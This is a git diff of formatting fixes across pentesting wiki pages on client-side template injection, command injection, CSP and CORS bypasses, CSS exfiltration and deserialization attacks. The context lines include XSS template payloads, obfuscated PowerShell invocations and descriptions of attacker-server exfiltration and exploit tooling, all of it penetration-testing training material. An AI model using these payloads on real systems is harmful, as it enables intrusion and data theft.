b/pentesting-web/client-side-template-injection-csti.md index 88bbbed0..e10b68ce 100644 --- a/pentesting-web/client-side-template-injection-csti.md +++ b/pentesting-web/client-side-template-injection-csti.md @@ -8,10 +8,10 @@ The way to **test** for this vulnerability is very **similar** as in the case of ## AngularJS - AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute (also known as an AngularJS directive). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.\ +AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute (also known as an AngularJS directive). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.\ For example, if your **input** is being **reflected** inside the **body** of the HTML and the body is defined with `ng-app`: **``** -You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**: +You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**: ```javascript {{$on.constructor('alert(1)')()}} @@ -22,10 +22,10 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
``` -You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) +You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) {% hint style="danger" %} -****[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. +[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. {% endhint %} ## VueJS @@ -58,11 +58,11 @@ Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/resea Credit: [Mario Heiderich](https://twitter.com/cure53berlin) -**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)**** +**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected) ## Mavo -Payload: +Payload: ``` [7*7] @@ -78,7 +78,7 @@ javascript:alert(1)%252f%252f..%252fcss-images [self.alert(1)mod1] ``` -**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)**** +**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations) ## **Brute-Force Detection List** diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md index e9d6708d..9e660da5 100644 --- a/pentesting-web/command-injection.md +++ b/pentesting-web/command-injection.md @@ -112,8 +112,8 @@ Online tools to check for DNS based data exfiltration: #### Windows ``` -powershell C:\*\*2\n??e*d.*? # notepad -@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc +powershell C:**2\n??e*d.*? # notepad +@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc ``` #### Linux diff --git a/pentesting-web/content-security-policy-csp-bypass.md b/pentesting-web/content-security-policy-csp-bypass.md index 944601fd..2b9ff45d 100644 --- a/pentesting-web/content-security-policy-csp-bypass.md +++ b/pentesting-web/content-security-policy-csp-bypass.md @@ -41,21 +41,21 @@ object-src 'none'; ### Directives -* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. -* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. -* **Child-src**: This directive defines allowed resources for web workers and embedded frame contents. -* **connect-src**: This directive restricts URLs to load using interfaces like fetch, websocket, XMLHttpRequest -* **frame-src**: This directive restricts URLs to which frames can be called out. -* **frame-ancestors**: This directive specifies the sources that can embed the current page. This directive applies to , , , and tags. This directive can't be used in tags and applies only to non-HTML resources. +* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. +* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. +* **Child-src**: This directive defines allowed resources for web workers and embedded frame contents. +* **connect-src**: This directive restricts URLs to load using interfaces like fetch, websocket, XMLHttpRequest +* **frame-src**: This directive restricts URLs to which frames can be called out. +* **frame-ancestors**: This directive specifies the sources that can embed the current page. This directive applies to , , , and tags. This directive can't be used in tags and applies only to non-HTML resources. * **img-src**: It defines allowed sources to load images on the web page. * **font-src:** directive specifies valid sources for fonts loaded using `@font-face`. -* **manifest-src**: This directive defines allowed sources of application manifest files. -* **media-src**: It defines allowed sources from where media objects like , and can be loaded. +* **manifest-src**: This directive defines allowed sources of application manifest files. +* **media-src**: It defines allowed sources from where media objects like , and can be loaded. * **object-src**: It defines allowed sources for the \, \, and \ elements elements. -* **base-uri**: It defines allowed URLs which can be loaded using element. -* **form-action**: This directive lists valid endpoints for submission from tags. -* **plugin-types**: It defines limits the kinds of mime types a page may invoke. -* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. +* **base-uri**: It defines allowed URLs which can be loaded using element. +* **form-action**: This directive lists valid endpoints for submission from tags. +* **plugin-types**: It defines limits the kinds of mime types a page may invoke. +* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. * **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy. ### **Sources** @@ -123,7 +123,7 @@ Content-Security-Policy: script-src 'self'; object-src 'none' ; If you can upload a JS file you can bypass this CSP: -Working payload: +Working payload: ```markup "/>'> @@ -148,7 +148,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}}
``` -#### Other payloads: +#### Other payloads: ```markup @@ -199,7 +199,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin. If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](dangling-markup-html-scriptless-injection.md). Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\ -****If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. +If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. ```html @@ -214,7 +214,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However, ?search=#x ``` -**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)**** +**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) ### AngularJS and whitelisted domain @@ -253,7 +253,7 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle]( You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) -### img-src \*; via XSS (iframe) - Time attack +### img-src \*; via XSS (iframe) - Time attack Notice the lack of the directive `'unsafe-inline'` \ This time you can make the victim **load** a page in **your control** via **XSS** with a ` ``` -### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) +### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) ```javascript document.querySelector('DIV').innerHTML=""; @@ -347,7 +347,7 @@ Trick from [**here**](https://ctftime.org/writeup/29310). ## Policy Injection -**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)**** +**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection) ### Chrome diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md index e585bdf2..8c8c13a4 100644 --- a/pentesting-web/cors-bypass.md +++ b/pentesting-web/cors-bypass.md @@ -60,7 +60,7 @@ xhr.send('Arun'); ### Pre-flight request -Under certain circumstances, when a cross-domain request: +Under certain circumstances, when a cross-domain request: * includes a **non-standard HTTP method (HEAD, GET, POST)** * includes new **headers** @@ -257,7 +257,7 @@ XSSI designates a kind of vulnerability which exploits the fact that, when a res This is especially interesting when it comes to dynamic JavaScript or JSONP when so-called ambient-authority information like cookies are used for authentication. The cookies are included when requesting a resource from a different host. BurpSuite plugin: [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp) -\*\*\*\*[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md)\*\*\*\* +[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md) Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy. diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md index 77bf1582..44510c27 100644 --- a/pentesting-web/crlf-0d-0a.md +++ b/pentesting-web/crlf-0d-0a.md @@ -185,4 +185,4 @@ The best prevention technique is to not use users input directly inside response ## References -* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**** +* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/) diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md index f3900fdc..c0e64901 100644 --- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md +++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md @@ -87,7 +87,7 @@ An attacker can create a **malicious web page** on their own domain which **esta ### Simple Attack -Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. +Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.: @@ -127,7 +127,7 @@ wsHook.after = function(messageEvent, url, wsObject) { xhttp.open("GET", "server_msg?m="+messageEvent.data, true); xhttp.send(); return messageEvent; -} +} ``` Now download the `wsHook.js` file from [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) and **save it inside the folder with the web files**.\ @@ -145,6 +145,6 @@ As Web Sockets are a mechanism to **send data to server side and client side**, {% embed url="https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages" %} -**** + \ diff --git a/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md b/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md index 150a26b2..93d222b0 100644 --- a/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md +++ b/pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md @@ -13,7 +13,7 @@ However, if for whatever reason you **MUST** do it **char by char** (maybe the c Therefore, what you can do is to **add a lot of junk chars** (For example **thousands of "W"s**) to **fill the web page before the secret**. We do this so the image is not loaded at the begging. -However, you make the **bot access the page** with something like +However, you make the **bot access the page** with something like ``` #:~:text=SECR @@ -69,7 +69,7 @@ The previous technique has some drawbacks, check the prerequisites. You either n However, there is another clever technique that uses **CSS `@import`** to improve the quality of the technique. -This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) **** and it works like this: +This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) and it works like this: Instead of loading the same page once and again with tens of different payloads each time (like in the previous one), we are going to **load the page just once and just with an import to the attackers server** (this is the payload to send to the victim): @@ -197,7 +197,7 @@ We still needing an improved method to start the iteration because ` - **Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html) +**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html) This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed. diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md index 82c3b427..69335215 100644 --- a/pentesting-web/deserialization/README.md +++ b/pentesting-web/deserialization/README.md @@ -17,8 +17,8 @@ Magic method used with serialization: Magic method used with deserialization -* `__wakeup` is called when an object is deserialized. -* `__destruct` is called when PHP script end and object is destroyed. +* `__wakeup` is called when an object is deserialized. +* `__destruct` is called when PHP script end and object is destroyed. * `__toString` uses object as string but also can be used to read file or more than that based on function call inside it. ```php @@ -96,9 +96,9 @@ $ser=serialize($o); ### PHPGGC (ysoserial for PHP) -****[**PHPGCC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\ +[**PHPGCC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\ Note than in several cases you **won't be able to find a way to abuse a deserialization in the source code** of the application but you may be able to **abuse the code of external PHP extensions.**\ -****So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse. +So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse. ### phar:// metadata deserialization @@ -220,7 +220,7 @@ funcster.deepDeserialize(desertest3) **For**[ **more information read this page**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.** -### ****[**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)**** +### [**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript) The package **doesn’t include any deserialization functionalit**y and requires you to implement it yourself. Their example uses `eval` directly. This is the official deserialisation example: @@ -305,14 +305,14 @@ When running **gadgetinspector** (after building it) don't care about the tons o Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** (and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\ [**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.** \ -****GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.** +GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.** Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\ [**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) \ -****Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations. +Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations. You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\ -[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)**** +[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/) **Serialization Test** @@ -324,7 +324,7 @@ If you find a java serialized object being sent to a web application, **you can #### **ysoserial** The most well-known tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\ -****Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\ +Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\ I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is. ```bash @@ -403,7 +403,7 @@ You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollecti #### marshalsec -****[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\ +[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\ In order to compile the project I needed to **add** this **dependencies** to `pom.xml`: ```markup @@ -505,7 +505,7 @@ public class LookAheadObjectInputStream extends ObjectInputStream { **Harden All java.io.ObjectInputStream Usage with an Agent** - If you don't own the code or can't wait for a patch, using an agent to weave in hardening to `java.io.ObjectInputStream` is the best solution.\ +If you don't own the code or can't wait for a patch, using an agent to weave in hardening to `java.io.ObjectInputStream` is the best solution.\ Using this approach you can only Blacklist known malicious types and not whitelist them as you don't know which object are being serialized. To enable these agents, simply add a new JVM parameter: @@ -554,7 +554,7 @@ There are several products using this middleware to send messages: So, basically there are a **bunch of services using JMS on a dangerous way**. Therefore, if you have **enough privileges** to send messages to this services (usually you will need valid credentials) you could be able to send **malicious objects serialized that will be deserialized by the consumer/subscriber**.\ This means that in this exploitation all the **clients that are going to use that message will get infected**. -You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability. +You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability. The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to **connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application. @@ -591,8 +591,8 @@ If you want to learn about **how does ysoserial.net creates it's exploit** you c The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output` ** and **`--plugin`.** * **`--gadget`** used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands). -* **`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it) -* **`--output` ** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._ +* **`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it) +* **`--output` ** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._ * **`--plugin` ** ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState #### More ysoserial.net parameters diff --git a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md index ed83d70c..fe79ee4e 100644 --- a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md +++ b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md @@ -4,7 +4,7 @@ In this POST it's going to be explained an example using java.io.Serializable. ## Serializable -The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). +The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). Lets see an example with a **class Person** which is **serializable**. This class **overwrites the readObject** function, so when **any object** of this **class** is **deserialized** this **function** is going to b **executed**.\ In the example, the **readObject function** of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog (for some reason) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:** diff --git a/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md index e0be26ed..a6923068 100644 --- a/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md +++ b/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md @@ -1,6 +1,6 @@ # Exploiting \_\_VIEWSTATE knowing the secrets -**The content of this post was extracted from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)**** +**The content of this post was extracted from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) ## Introduction @@ -116,7 +116,7 @@ _It uses the ActivitySurrogateSelector gadget by default that requires compiling #### Application path - it is important to find the root of the application path in order to create a valid ViewState unless: +it is important to find the root of the application path in order to create a valid ViewState unless: * The application uses .NET Framework version 4.0 or below; and * The `__VIEWSTATEGENERATOR` parameter is known. diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index 9f13b677..03ad11cd 100644 --- a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -173,7 +173,7 @@ out of band request with the current username ## References -* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)**** -* ****[**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)****\ - **** -* ****[**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)**** +* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) +* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\ + +* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md index c53b16f4..bad6ee00 100644 --- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md +++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md @@ -117,7 +117,7 @@ Therefore, the only thing needed to get RCE a **vulnerable version of Log4j proc * [**CVE-2021-4104**](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[High]**: Did we say Log4j 2.x versions were vulnerable? What about **Log4j 1.x**?\ \ - While previously thought to be safe, Log4Shell found a way to lurk in the older Log4j too. Essentially, **non-default configuration of Log4j 1.x instances using the \_JMSAppender**\_\*\* class also become susceptible to the untrusted deserialization flaw\*\*.\ + While previously thought to be safe, Log4Shell found a way to lurk in the older Log4j too. Essentially, **non-default configuration of Log4j 1.x instances using the \_JMSAppender**\_** class also become susceptible to the untrusted deserialization flaw**.\ \ Although a less severe variant of CVE-2021-44228, nonetheless, this CVE impacts all versions of the [log4j:log4j](https://search.maven.org/artifact/log4j/log4j) and [org.apache.log4j:log4j](https://mvnrepository.com/artifact/org.apache.log4j/log4j) components for which only 1.x releases exist. Because these are [end-of-life](https://logging.apache.org/log4j/1.2/) versions, **a fix for 1.x branch does not exist anywhere**, and one should upgrade to _log4j-core_ 2.17.0. (Apparently 1.0 isn't vulnerable).\ @@ -231,7 +231,7 @@ For **more information** (_like limitations on RMI and CORBA vectors_) **check t ### RCE - Marshalsec with custom payload -_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](https://tryhackme.com/room/solar)_\*\*\*\*_ +_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](https://tryhackme.com/room/solar)__ For this exploit the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (download a [**jar version from here**](https://github.com/RandomRobbieBF/marshalsec-jar)) will be used to create a LDAP referral server to direct connections to our secondary HTTP server were the exploit will be served: diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md index 9c70c6ff..6151d11d 100644 --- a/pentesting-web/deserialization/python-yaml-deserialization.md +++ b/pentesting-web/deserialization/python-yaml-deserialization.md @@ -72,7 +72,7 @@ print(yaml.unsafe_load_all(data)) **Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)` -You can find the **** [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is: +You can find the [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is: ```yaml !!python/object/new:str diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md index aa06a8e3..d4bfd236 100644 --- a/pentesting-web/domain-subdomain-takeover.md +++ b/pentesting-web/domain-subdomain-takeover.md @@ -21,7 +21,7 @@ There are several tools with dictionaries to check for possible takeovers: ## Exploiting a Subdomain takeover -**This information was copied from** [**https://0xpatrik.com/subdomain-takeover/**](https://0xpatrik.com/subdomain-takeover/)\*\*\*\* +**This information was copied from** [**https://0xpatrik.com/subdomain-takeover/**](https://0xpatrik.com/subdomain-takeover/) Recently, I [wrote](https://0xpatrik.com/subdomain-takeover-basics/) about subdomain takeover basics. Although the concept is now generally well-understood, I noticed that people usually struggle to grasp the risks that subdomain takeover brings to the table. In this post, I go in-depth and cover the most notable risks of _subdomain takeover_ from my perspective. diff --git a/pentesting-web/email-header-injection.md b/pentesting-web/email-header-injection.md index ccb00280..5358009b 100644 --- a/pentesting-web/email-header-injection.md +++ b/pentesting-web/email-header-injection.md @@ -70,9 +70,9 @@ Here are a few examples of different man pages of sendmail command/interface: * Postfix MTA: http://www.postfix.org/mailq.1.html * Exim MTA: https://linux.die.net/man/8/eximReferences -Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)**** +Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html) ## References -* [**https://resources.infosecinstitute.com/email-injection/**](https://resources.infosecinstitute.com/email-injection/)**** -* [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)**** +* [**https://resources.infosecinstitute.com/email-injection/**](https://resources.infosecinstitute.com/email-injection/) +* [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html) diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index 6867c9f0..c8e3bdd0 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of 